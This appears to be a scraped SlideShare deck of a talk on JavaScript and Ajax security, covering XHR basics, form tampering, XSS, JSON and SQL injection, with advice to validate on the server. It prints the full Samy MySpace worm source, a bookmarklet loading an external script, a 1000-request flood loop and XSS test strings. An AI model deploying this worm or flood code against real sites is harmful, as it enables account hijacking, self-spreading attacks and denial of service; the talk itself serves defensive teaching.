Investigating JavaScript  and Ajax Security Presented By: Eric Pascarello
Background on Eric Pascarello <ul><li>Author of: </li></ul><ul><ul><li>Ajax In Action [Manning] </li></ul></ul><ul><ul><li...
What we are going to investigate <ul><li>Ajax Model </li></ul><ul><li>Classic Postback Model </li></ul><ul><li>Form Hacks ...
One thing everyone must do: Use Common Sense!
What is Ajax exactly?
Quick Intro to Ajax <ul><li>Ajax is Asynchronous JavaScript and XML </li></ul><ul><li>Coined by Jesse James Garrett of Ada...
Ajax Security Makes a lot of news because of: <ul><li>Inexperienced developers working with technologies they do not under...
Adaptive Path’s Original Diagram
The Real Life Diagram Of Ajax  How to explain Ajax to your non-geek friends <ul><li>THE COLLEGE PARTY </li></ul>
The Bleak Situation
The Non-Ajax Solution <ul><li>Figure out what is more important and rank order of operation. </li></ul><ul><li>Should I cl...
The Ajax Solution <ul><li>Do multiple things at once! </li></ul><ul><li>Hire a maid to do the cleaning! </li></ul><ul><li>...
The “Ajax Engine” <ul><li>The XMLHttpRequest Object  </li></ul><ul><ul><li>Allows us to send information server without po...
The XHR Object <ul><li>The Gecko / Safari / IE7 Object Constructor </li></ul><ul><ul><li>req = new XMLHttpRequest(); </li>...
XHR Object Methods  Assigns header to be sent with a request  setRequestHeader(&quot;label&quot;, &quot;value&quot;)  Tran...
XHR open() <ul><li>open(&quot;method&quot;, &quot;URL&quot;, asyncFlag); method = GET or POST </li></ul><ul><li>URL = Page...
send(parameters) <ul><li>Send is like clicking the submit button on a form. </li></ul><ul><li>The parameters should be set...
XHR Object Properties  String message accompanying the status code  statusText  Numeric code returned by server, such as 4...
onreadystatechange <ul><li>The objects only event handler. </li></ul><ul><li>It is fired only when in asynchronous mode  <...
readyState values  <ul><li>0 - Uninitialized  </li></ul><ul><ul><li>The initial value when new reference to Object is crea...
status <ul><li>We are looking for a value of 200 </li></ul><ul><li>If you are working on the file protocol  </li></ul><ul>...
Basic Example of code <ul><li>var req = GetXHRObject(); </li></ul><ul><li>req.open(&quot;POST&quot;, &quot;secure.aspx&quo...
I CAN VIEW THE SOURCE <ul><li>I can see the page that it is requesting from the JavaScript code! </li></ul><ul><li>I can s...
Before We Surrender to Fear <ul><li>Let us look at the classic postback  </li></ul><ul><li>and Ajax models in detail </li>...
What is Different? <ul><li>Ajax POST </li></ul><ul><li>var req = GetXHRObject(); </li></ul><ul><li>req.open(&quot;POST&quo...
A Web 2.0 Web Site
Major Cause Of Security Concerns <ul><li>Ajax model uses WebServices </li></ul><ul><ul><li>Legacy or New </li></ul></ul><u...
Major Cause Of Security Concerns <ul><li>Business Logic </li></ul><ul><li>Building Proxy Services to talk to outside domai...
Grandma is a Hacker <ul><li>Everyone is giving you bad data. </li></ul><ul><li>Everyone is trying to hack you </li></ul><u...
Business Logic Security <ul><li>JavaScript is basically open source.  </li></ul><ul><li>Use JavaScript as the rendering En...
The First Get Some Common Sense Award Goes To: <ul><li>A tutorial on Ajax to display data into a textarea </li></ul><ul><l...
So You Think Your Form Is Safe? <ul><li>Example </li></ul><ul><li>Address bar is our friend for reckoning havoc! </li></ul...
Hidden Fields Are Editable? <ul><li>The  Bookmarklet  and the  Example </li></ul><ul><li>Bookmarklets makes it easy to exe...
Who Needs ServerSide Validation When We Have ClientSide Checks? <ul><li>Example </li></ul><ul><li>Why waste time disabling...
Simple Scripted Attacks On A Server <ul><li>var req = new Array(); </li></ul><ul><li>for(var i = 0; i<1000; i++){ </li></u...
Is This A Vulnerability? YES  or  NO
What is your browser telling others about you? <ul><li>The advertisers dream, the health insurance companies dream, your s...
So with some JavaScript we can test where you been <ul><li>Targeted Advertising for geeks, gamers,  pet owners, sports fan...
Let Us Now Look AT XSS <ul><li>Cross Site Scripting  (XSS) allows for malicious people to inject HTML, JavaScript, PHP, PE...
The Second Get Some Common Sense Award Goes To: <ul><li>Ask.com </li></ul><ul><li>They allow you to save your preference s...
Biggest Offenders in XSS <ul><li>Web Pages that use </li></ul><ul><ul><li>Search Pages </li></ul></ul><ul><ul><li>Guestboo...
Test For JavaScript Injection <ul><li>Step 1: type in <script>alert(&quot;hi&quot;);</script> into any field on a page. </...
Cross Site Scripting Cheat Sheet Esp: for filter evasion  <ul><li>http://ha.ckers.org/xss.html </li></ul><ul><li>Website h...
Combine Visited Links with XSS <ul><li>So lets say we have a list of XSS hacks we know about. Lets say Bank MoneyBags has ...
What can be done? <ul><li>Add key listeners and send data to outside servers. </li></ul><ul><li>Change user names, passwor...
Real Life JavaScript Injections with Ajax! <ul><li>Samy  [ http:// en.wikipedia.org/wiki/Samy_(XSS ) ] </li></ul><ul><ul><...
The code of Samy <ul><li><div id=mycode style=&quot;BACKGROUND: url('java  script:eval(document.all.mycode.expr)')&quot; e...
Samy Injection Highlight <ul><li><div id=mycode style=&quot;BACKGROUND: url('java  script:eval(document.all.mycode.expr)')...
Yahoo gets attacked! <ul><li>Yamanner  [ http:// en.wikipedia.org/wiki/Yamanner ] </li></ul><ul><ul><li>Yahoo! Mail worm <...
JavaScript Port Scanning? <ul><li>JavaScript Port Scanning can be done! </li></ul><ul><ul><li>http:// www.spidynamics.com/...
JSON Injection <ul><li>JavaScript Object Notation (normally preferred over XML format) </li></ul><ul><li>Can bypass the Cr...
Other Injections <ul><li>SQL Injection </li></ul><ul><ul><li>Quick test in an URL insert ' to the querystring and see if y...
Same Domain Policy Workaround: Proxy!
What is bad about this? <ul><li>Inject JavaScript code onto page. </li></ul><ul><ul><li>Free data mining service with unli...
Other Tools <ul><li>Firefox Extensions </li></ul><ul><ul><li>Firebug – view the XMLHttpRequests </li></ul></ul><ul><ul><li...
Quick Summary <ul><li>Ajax Adds more attack vectors </li></ul><ul><li>Do what you always done on the server! </li></ul><ul...
Questions <ul><li>Email:  [email_address] </li></ul><ul><li>Blog:  http:// radio.javaranch.com/pascarello </li></ul><ul><l...
Upcoming SlideShare
Loading in …5
×

Pascarello_Investigating JavaScript and Ajax Security

9,693 views
9,601 views

Published on

Investigating JavaScript and Ajax Security

Published in: Business, Technology
1 Comment
11 Likes
Statistics
Notes
No Downloads
Views
Total views
9,693
On SlideShare
0
From Embeds
0
Number of Embeds
62
Actions
Shares
0
Downloads
0
Comments
1
Likes
11
Embeds 0
No embeds

No notes for slide
  • Pascarello_Investigating JavaScript and Ajax Security

    1. 1. Investigating JavaScript and Ajax Security Presented By: Eric Pascarello
    2. 2. Background on Eric Pascarello <ul><li>Author of: </li></ul><ul><ul><li>Ajax In Action [Manning] </li></ul></ul><ul><ul><li>JavaScript: Your visual blueprint for building dynamic Web pages (2 nd ed) [Wiley] </li></ul></ul><ul><li>HTML and JavaScript Moderator at JavaRanch.com since 2001 </li></ul><ul><li>Developer at Market10.com </li></ul><ul><li>Perform talks on Ajax around the world. </li></ul>
    3. 3. What we are going to investigate <ul><li>Ajax Model </li></ul><ul><li>Classic Postback Model </li></ul><ul><li>Form Hacks </li></ul><ul><li>XSS - JavaScript Injection </li></ul><ul><li>Ajax Worms </li></ul><ul><li>Other Injections </li></ul>
    4. 4. One thing everyone must do: Use Common Sense!
    5. 5. What is Ajax exactly?
    6. 6. Quick Intro to Ajax <ul><li>Ajax is Asynchronous JavaScript and XML </li></ul><ul><li>Coined by Jesse James Garrett of Adaptive Path </li></ul><ul><li>Not a language! </li></ul><ul><li>Uses JavaScript on the client and any Language on the Server </li></ul>
    7. 7. Ajax Security Makes a lot of news because of: <ul><li>Inexperienced developers working with technologies they do not understand! </li></ul><ul><ul><li>PHP + FREE SERVERS + MySQL + AJAX = BIG SECURITY HOLES </li></ul></ul><ul><ul><li>JavaScript: </li></ul></ul><ul><ul><ul><li>The Cutting Edge Technology of Ctrl-C and Ctrl-V </li></ul></ul></ul><ul><li>Tutorials, Articles, and Books skipping the security aspect. </li></ul><ul><li>Tons of High Profile Websites using it! </li></ul>
    8. 8. Adaptive Path’s Original Diagram
    9. 9. The Real Life Diagram Of Ajax How to explain Ajax to your non-geek friends <ul><li>THE COLLEGE PARTY </li></ul>
    10. 10. The Bleak Situation
    11. 11. The Non-Ajax Solution <ul><li>Figure out what is more important and rank order of operation. </li></ul><ul><li>Should I clean the mess, get food, or update the outdated music collection? </li></ul><ul><li>Perform one task and do the others after each other. Hopefully I have enough time! </li></ul><ul><ul><li>Go to Store, Download Music, Clean Apartment so it can be trashed again. </li></ul></ul>
    12. 12. The Ajax Solution <ul><li>Do multiple things at once! </li></ul><ul><li>Hire a maid to do the cleaning! </li></ul><ul><li>Order delivery pizza! </li></ul><ul><li>And I can download new music while others do the dirty work! Ajax Clean! </li></ul>
    13. 13. The “Ajax Engine” <ul><li>The XMLHttpRequest Object </li></ul><ul><ul><li>Allows us to send information server without post backs </li></ul></ul><ul><ul><li>Makes the request and receives the data back </li></ul></ul><ul><ul><li>Can be asynchronous or synchronous </li></ul></ul><ul><li>Same Domain Policy </li></ul><ul><ul><li>Can not make requests to other domains </li></ul></ul>
    14. 14. The XHR Object <ul><li>The Gecko / Safari / IE7 Object Constructor </li></ul><ul><ul><li>req = new XMLHttpRequest(); </li></ul></ul><ul><li>The ActiveX for IE 5 to IE 6 </li></ul><ul><ul><li>req = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;); </li></ul></ul><ul><li>OR </li></ul><ul><ul><li>req = new ActiveXObject(&quot;Msxml2.XMLHTTP&quot;); </li></ul></ul>
    15. 15. XHR Object Methods Assigns header to be sent with a request setRequestHeader(&quot;label&quot;, &quot;value&quot;) Transmits the request send(content) The heart and soul! Sets destination URL, method, and other optional attributes open(&quot;method&quot;, &quot;URL&quot;[, asyncFlag[, &quot;userName&quot;[, &quot;password&quot;]]]) Returns value of a specified header label getResponseHeader(&quot;headerLabel&quot;) Returns all header (labels/value) sets getAllResponseHeaders() Stops the current request abort() Description Method
    16. 16. XHR open() <ul><li>open(&quot;method&quot;, &quot;URL&quot;, asyncFlag); method = GET or POST </li></ul><ul><li>URL = Page to request </li></ul><ul><li>asyncFlag = True or False </li></ul>
    17. 17. send(parameters) <ul><li>Send is like clicking the submit button on a form. </li></ul><ul><li>The parameters should be set to null or empty string if you are not posting any information. </li></ul><ul><li>If you are posting, the name/value pairs should look like a querystring without the question mark. </li></ul><ul><ul><li>req.send(&quot;foo=bar&ajax=123&quot;); </li></ul></ul><ul><li>If you are using GET, append the values to the URL in the open method. </li></ul><ul><ul><li>Remember GET has a size limitation. </li></ul></ul><ul><li>If you want to send information, you have to add it manually. </li></ul><ul><ul><li>No free ride like a form! </li></ul></ul>
    18. 18. XHR Object Properties String message accompanying the status code statusText Numeric code returned by server, such as 404 for &quot;Not Found&quot; or 200 for &quot;OK&quot; status DOM-compatible document object of data returned from server process responseXML String version of data returned from server process responseText Object status integer readyState Event handler for an event that fires at every state change onreadystatechange Description Property
    19. 19. onreadystatechange <ul><li>The objects only event handler. </li></ul><ul><li>It is fired only when in asynchronous mode </li></ul><ul><ul><li>3 rd parameter is set to true in the open method </li></ul></ul><ul><li>It is fired a total of 4 times. </li></ul><ul><li>We can assign a reference to a function or build a anonymous function to it </li></ul><ul><ul><li>req.onreadystatechange = functionName; </li></ul></ul><ul><ul><li>req.onreadystatechange = function(){ //statements } </li></ul></ul>
    20. 20. readyState values <ul><li>0 - Uninitialized </li></ul><ul><ul><li>The initial value when new reference to Object is created </li></ul></ul><ul><li>1 - Open </li></ul><ul><ul><li>The open() method has been successfully called. </li></ul></ul><ul><li>2 - Sent </li></ul><ul><ul><li>The request made it, but no data has yet been received. </li></ul></ul><ul><li>3 - Receiving </li></ul><ul><ul><li>All HTTP headers have been received. </li></ul></ul><ul><ul><li>Value set right before receiving the message body </li></ul></ul><ul><li>4 - Loaded </li></ul><ul><ul><li>The data transfer has been completed. </li></ul></ul><ul><ul><li>We can now play with the data! </li></ul></ul>
    21. 21. status <ul><li>We are looking for a value of 200 </li></ul><ul><li>If you are working on the file protocol </li></ul><ul><li>(eg: local disk not on a web server) than you are looking for a value of 0 [zero]). </li></ul><ul><li>Yes the XMLHttpRequest object can be run off of the Active Desktop. </li></ul><ul><li>Can be read when readyState = 4 </li></ul>
    22. 22. Basic Example of code <ul><li>var req = GetXHRObject(); </li></ul><ul><li>req.open(&quot;POST&quot;, &quot;secure.aspx&quot;, true); </li></ul><ul><li>req.onreadystatechange = finishRequest; </li></ul><ul><li>req.send(&quot;foo=bar&ajax=123&quot;); </li></ul><ul><li>BasicExample1.html </li></ul>
    23. 23. I CAN VIEW THE SOURCE <ul><li>I can see the page that it is requesting from the JavaScript code! </li></ul><ul><li>I can see the parameters being sent! </li></ul><ul><li>I can see the validation! </li></ul><ul><li>I can see the Business Logic! </li></ul><ul><li>I can rule the world! </li></ul>
    24. 24. Before We Surrender to Fear <ul><li>Let us look at the classic postback </li></ul><ul><li>and Ajax models in detail </li></ul>
    25. 25. What is Different? <ul><li>Ajax POST </li></ul><ul><li>var req = GetXHRObject(); </li></ul><ul><li>req.open(&quot;POST&quot;, &quot;secure.php&quot;, true); </li></ul><ul><li>req.onreadystatechange = finishRequest; </li></ul><ul><li>req.send(&quot;foo=bar&ajax=123&quot;); </li></ul><ul><li>Regular Form POST </li></ul><ul><li><form action=&quot;secure.php&quot; method=&quot;POST&quot;> </li></ul><ul><li><input type=&quot;text&quot; name=&quot;foo&quot; value=&quot;bar&quot;> </li></ul><ul><li><input type=&quot;hidden&quot; name=&quot;ajax&quot; value=&quot;123&quot;> </li></ul><ul><li><input type=&quot;submit&quot; name=&quot;sub1&quot;> </li></ul><ul><li></form> </li></ul>
    26. 26. A Web 2.0 Web Site
    27. 27. Major Cause Of Security Concerns <ul><li>Ajax model uses WebServices </li></ul><ul><ul><li>Legacy or New </li></ul></ul><ul><ul><li>Return HTML/TEXT/JSON/XML/ETC </li></ul></ul><ul><li>More Ajax Functionality = More WebServices = More places to attack </li></ul><ul><ul><li>Just need to forget one thing to make a new hole </li></ul></ul><ul><li>Yes you can use the XMLHttpRequest Object to make requests without the users knowledge. </li></ul><ul><ul><li>We can also use images, iframes, frames, popup windows. </li></ul></ul>
    28. 28. Major Cause Of Security Concerns <ul><li>Business Logic </li></ul><ul><li>Building Proxy Services to talk to outside domains </li></ul><ul><li>Displaying User Content </li></ul><ul><ul><li>Tags, forums, blogs, comments, etc </li></ul></ul>
    29. 29. Grandma is a Hacker <ul><li>Everyone is giving you bad data. </li></ul><ul><li>Everyone is trying to hack you </li></ul><ul><li>Everyone wants to cause a DOS attack on your server! </li></ul><ul><li>VALIDATE ON THE SERVER! </li></ul>
    30. 30. Business Logic Security <ul><li>JavaScript is basically open source. </li></ul><ul><li>Use JavaScript as the rendering Engine </li></ul><ul><li>Validate the info on the server! </li></ul><ul><ul><li>Use ClientSide validation as a mechanism to save user time and bandwidth </li></ul></ul><ul><li>JavaScript Obfuscation is easily reversed! Don’t waste your money! </li></ul>
    31. 31. The First Get Some Common Sense Award Goes To: <ul><li>A tutorial on Ajax to display data into a textarea </li></ul><ul><li>function getOnlineClass() </li></ul><ul><li>{ </li></ul><ul><li>var url = 'http://localhost/MyOnlineClass?sql=SELECT* from LOP FOR XML AUTO &root=DSLOP'; </li></ul><ul><li>http.open(&quot;GET&quot;, url, true); </li></ul><ul><li>http.onreadystatechange = useHttpResponse; </li></ul><ul><li>http.send(null); </li></ul><ul><li>} </li></ul><ul><li>I wish I would have made this up! </li></ul>
    32. 32. So You Think Your Form Is Safe? <ul><li>Example </li></ul><ul><li>Address bar is our friend for reckoning havoc! </li></ul><ul><li>javascript:yourStatements;void(0); </li></ul><ul><li>Add an external JavaScript file! </li></ul><ul><ul><li>javascript:var a=document.createElement(&quot;script&quot;);a.src=&quot;http://url/foo.js&quot;;document.body.appendChild(a);void(0); </li></ul></ul>
    33. 33. Hidden Fields Are Editable? <ul><li>The Bookmarklet and the Example </li></ul><ul><li>Bookmarklets makes it easy to execute code instead of manually adding it to the address bar. </li></ul><ul><li>What is a bookmarklet? </li></ul><ul><ul><li>JavaScript statement(s) stored in a favorites link! </li></ul></ul><ul><li>How can I do this? Create a link on a webpage, save the page, open it, right click on the link, add to favorites. </li></ul><ul><ul><li><a href=&quot;javascript:alert(new Date());void(0);&quot;>Show Time</a> </li></ul></ul>
    34. 34. Who Needs ServerSide Validation When We Have ClientSide Checks? <ul><li>Example </li></ul><ul><li>Why waste time disabling JavaScript when we can just override the annoying function! </li></ul><ul><li>Set event handlers, functions, variables from status bar! </li></ul>
    35. 35. Simple Scripted Attacks On A Server <ul><li>var req = new Array(); </li></ul><ul><li>for(var i = 0; i<1000; i++){ </li></ul><ul><li>req[i] = GetXHRObject(); </li></ul><ul><li>req[i].open(&quot;POST&quot;, &quot;secure.aspx&quot;, true); </li></ul><ul><li>req[i].onreadystatechange = function(){}; </li></ul><ul><li>req[i].send(&quot;foo=&quot; + i); </li></ul><ul><li>} </li></ul>
    36. 36. Is This A Vulnerability? YES or NO
    37. 37. What is your browser telling others about you? <ul><li>The advertisers dream, the health insurance companies dream, your snooping boss’s dream JavaScript. </li></ul><ul><li>The links are telling us where we have been! </li></ul><ul><li>Example : Is it a vulnerability or a feature? </li></ul>
    38. 38. So with some JavaScript we can test where you been <ul><li>Targeted Advertising for geeks, gamers, pet owners, sports fans, porn lovers, etc. </li></ul><ul><li>Medical Privacy: Look to see if you been on Cancer Sites, looking at sites on Heart conditions, etc. </li></ul><ul><li>Your Company can check to see if you are doing online shopping without installing loggers! </li></ul><ul><li>Scan for Google Searches </li></ul><ul><ul><li>Only Problem: caps matter! </li></ul></ul><ul><ul><ul><li>http://www.google.com/search?q=Eric+Pascarello </li></ul></ul></ul><ul><ul><ul><li>http://www.google.com/search?q=eric+pascarello </li></ul></ul></ul>
    39. 39. Let Us Now Look AT XSS <ul><li>Cross Site Scripting (XSS) allows for malicious people to inject HTML, JavaScript, PHP, PERL, CSS, etc. into a Web page. </li></ul><ul><li>Gets around same domain policy </li></ul><ul><li>Allow injection of browser vulnerability code </li></ul><ul><li>Allows for people to steal information </li></ul><ul><li>Can create real annoying for-loop alert attacks! </li></ul>
    40. 40. The Second Get Some Common Sense Award Goes To: <ul><li>Ask.com </li></ul><ul><li>They allow you to save your preference settings on their site with a form. Problem is it is a GET! </li></ul><ul><li>http://www.ask.com/webprefs?addr1=&addr2=& qsrc =106&pu=100&padlt=1&pcn= FR&psave = Save+my+settings </li></ul><ul><li>The link will change the settings on their site to show 100 results, change the adult filter, country, etc. </li></ul><ul><li>Don’t update settings with GET </li></ul><ul><li>Set a hidden iFrame/image with this URL and you can change everyone’s settings that come to your web site. </li></ul><ul><li>The Google Toolbar used to has this same problem when it was first implemented! </li></ul>
    41. 41. Biggest Offenders in XSS <ul><li>Web Pages that use </li></ul><ul><ul><li>Search Pages </li></ul></ul><ul><ul><li>Guestbooks </li></ul></ul><ul><ul><li>RSS Readers </li></ul></ul><ul><ul><li>Blog Comments </li></ul></ul><ul><ul><li>Web based chat/games </li></ul></ul><ul><ul><li>Error Pages </li></ul></ul><ul><li>Anywhere user can insert data and it is redisplayed back without removing the escaping the user’s input! </li></ul><ul><li>Example Time with a Popular Website’s Search! (link not included!) </li></ul>
    42. 42. Test For JavaScript Injection <ul><li>Step 1: type in <script>alert(&quot;hi&quot;);</script> into any field on a page. </li></ul><ul><li>Step 2: Submit the page </li></ul><ul><li>Step 3: If you see the alert, you got success! If no alert continue </li></ul><ul><li>Step 4: View Source of Page and look for the code you added </li></ul><ul><li>Step 5: See if they are escaping everything correctly. </li></ul><ul><li>Step 6: Try the injections on the next slide </li></ul>
    43. 43. Cross Site Scripting Cheat Sheet Esp: for filter evasion <ul><li>http://ha.ckers.org/xss.html </li></ul><ul><li>Website has a long list of ways to get past filters. </li></ul><ul><li>Spend some time and go through the list! </li></ul>
    44. 44. Combine Visited Links with XSS <ul><li>So lets say we have a list of XSS hacks we know about. Lets say Bank MoneyBags has a XSS hole. </li></ul><ul><li>A surfer checks their balance at BankMoneyBags.com and did not sign out. He just surfed away. </li></ul><ul><li>The Surfer Went to site where this visited links code was. </li></ul><ul><li>Positive match was found for the Bank link, XSS link is fired into iFrame / pop-up window / image. </li></ul><ul><li>And the money is now in a Swiss Account! </li></ul>
    45. 45. What can be done? <ul><li>Add key listeners and send data to outside servers. </li></ul><ul><li>Change user names, passwords, preferences </li></ul><ul><li>Sniff out and steal sensitive data </li></ul><ul><li>Annoy users with infinite alert loops! </li></ul><ul><li>Send email </li></ul><ul><li>Add posts to forms </li></ul><ul><li>How much damage can Ajax plus XSS? We are talking about JavaScript! </li></ul>
    46. 46. Real Life JavaScript Injections with Ajax! <ul><li>Samy [ http:// en.wikipedia.org/wiki/Samy_(XSS ) ] </li></ul><ul><ul><li>MySpace.com </li></ul></ul><ul><ul><li>Ajax based worm that added user to friend’s list </li></ul></ul><ul><ul><li>October 4, 2005 </li></ul></ul><ul><ul><li>20 Hours </li></ul></ul><ul><ul><li>Over 1 million users had been effected </li></ul></ul><ul><ul><li>Flaw was based on CSS background image </li></ul></ul>
    47. 47. The code of Samy <ul><li><div id=mycode style=&quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')&quot; expr=&quot;var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}&quot;></DIV> </li></ul>
    48. 48. Samy Injection Highlight <ul><li><div id=mycode style=&quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')&quot; expr=&quot;var B=String.fromCharCode(34 </li></ul><ul><li>This injection is listed on http://ha.ckers.org/xss.html (Scroll past the halfway point on the page to see it!) </li></ul>
    49. 49. Yahoo gets attacked! <ul><li>Yamanner [ http:// en.wikipedia.org/wiki/Yamanner ] </li></ul><ul><ul><li>Yahoo! Mail worm </li></ul></ul><ul><ul><li>June 12, 2006 </li></ul></ul><ul><ul><li>Sent users address book to remote server </li></ul></ul><ul><ul><li><img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=&quot;&quot;onload=&quot;var http_request = false; </li></ul></ul><ul><ul><li>Have link to full code on my blog: http://radio.javaranch.com/pascarello/2006/06/13/1150210232222.html </li></ul></ul>
    50. 50. JavaScript Port Scanning? <ul><li>JavaScript Port Scanning can be done! </li></ul><ul><ul><li>http:// www.spidynamics.com/assets/documents/JSportscan.pdf </li></ul></ul><ul><li>General Summary From White Paper </li></ul><ul><ul><li>Code gets injected into intranet web page </li></ul></ul><ul><ul><li>Every Server Installation has default images </li></ul></ul><ul><ul><li>JavaScript scans IP ranges for defaults </li></ul></ul><ul><ul><li>If image has width/height, we know the server type, and IP address. </li></ul></ul><ul><ul><li>Post data back to outside server </li></ul></ul>
    51. 51. JSON Injection <ul><li>JavaScript Object Notation (normally preferred over XML format) </li></ul><ul><li>Can bypass the Cross Site Scripting Restrictions </li></ul><ul><li>http://www.pascarello.com/examples/JsonYahooExample.html </li></ul><ul><li>Problem with this: Code is eval()/injected onto page to make it usable for JavaScript. </li></ul><ul><ul><li>Have to trust your source they do not embed other code! </li></ul></ul><ul><ul><li>Preferred method is to loop through the data. </li></ul></ul><ul><ul><li>Check out JSON.org for more information! </li></ul></ul>
    52. 52. Other Injections <ul><li>SQL Injection </li></ul><ul><ul><li>Quick test in an URL insert ' to the querystring and see if you get an error message! …com?ID=314'159 </li></ul></ul><ul><li>CSS Injection </li></ul><ul><ul><li>Change the cached CSS file on the local machine! Screw with your friends that Digg is now pink! Hide the log in fields, move elements around! </li></ul></ul><ul><li>XML/SOAP </li></ul><ul><ul><li>Page can be loaded with bad data or data can be sent with bad data to the server! </li></ul></ul><ul><li>DOM Injection </li></ul><ul><ul><li>Additional elements can be added, removed, changed, etc. </li></ul></ul><ul><li>Cookies </li></ul><ul><ul><li>Delete, Add, Change, and see what happens to the sessions! </li></ul></ul>
    53. 53. Same Domain Policy Workaround: Proxy!
    54. 54. What is bad about this? <ul><li>Inject JavaScript code onto page. </li></ul><ul><ul><li>Free data mining service with unlimited access! </li></ul></ul><ul><ul><li>Most proxy services have limited access unless you have good relations! </li></ul></ul><ul><li>DOS service attacks </li></ul><ul><ul><li>Remember that Ajax For Loop making requests! </li></ul></ul><ul><ul><li>DOS the site, proxy thinks that the server is attacking them. </li></ul></ul><ul><ul><li>Rest of users on site lose the functionality </li></ul></ul>
    55. 55. Other Tools <ul><li>Firefox Extensions </li></ul><ul><ul><li>Firebug – view the XMLHttpRequests </li></ul></ul><ul><ul><li>Selenium – Record scripts and replay them! </li></ul></ul><ul><ul><li>JSView – See All JavaScript/CSS with a click </li></ul></ul><ul><ul><li>Modify Headers – (what the name implies!) </li></ul></ul><ul><ul><li>NoScript – Turn off or limit scripts </li></ul></ul><ul><li>Fiddler and other Proxys– Watch all traffic </li></ul>
    56. 56. Quick Summary <ul><li>Ajax Adds more attack vectors </li></ul><ul><li>Do what you always done on the server! </li></ul><ul><ul><li>Keep the business logic on the server </li></ul></ul><ul><ul><li>Validate on the server </li></ul></ul><ul><ul><ul><li>White List / Blacklist </li></ul></ul></ul><ul><ul><li>Check/Remove Injections </li></ul></ul><ul><li>Remember that Proxys can be abused! </li></ul><ul><li>Use Common Sense </li></ul>
    57. 57. Questions <ul><li>Email: [email_address] </li></ul><ul><li>Blog: http:// radio.javaranch.com/pascarello </li></ul><ul><li>Forums: http://saloon.JavaRanch.com </li></ul><ul><li>Ajax In Action: http://www.manning.com/crane </li></ul><ul><li>Need a Job? http://www.market10.com </li></ul>

    ×